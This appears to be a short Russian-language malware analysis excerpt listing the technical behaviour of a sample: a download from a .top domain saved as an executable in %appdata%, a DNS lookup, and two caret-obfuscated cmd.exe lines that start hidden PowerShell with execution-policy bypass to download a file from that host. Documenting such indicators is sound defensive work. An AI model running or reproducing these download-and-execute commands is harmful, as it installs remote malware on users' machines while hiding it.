Техническая информация
- http://roggistazli.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "po^Wer^s^HEL^l^.e^xE^ ^-^ExecutION^POli^cY by^pa^s^s -NoprofIL^e -w^INDOW^S^TYLe^ h^I^d^dE^N (Ne^W^-^Ob^jECT S^YsTeM.n^E^t.wEbcl^IEnT).^DOwNLOadfile('http://roggistazli.top/search.ph...
- DNS ASK ro###stazli.top
- '<SYSTEM32>\cmd.exe' /C "po^Wer^s^HEL^l^.e^xE^ ^-^ExecutION^POli^cY by^pa^s^s -NoprofIL^e -w^INDOW^S^TYLe^ h^I^d^dE^N (Ne^W^-^Ob^jECT S^YsTeM.n^E^t.wEbcl^IEnT).^DOwNLOadfile('http://roggistazli.top/search.ph...' (со скрытым окном)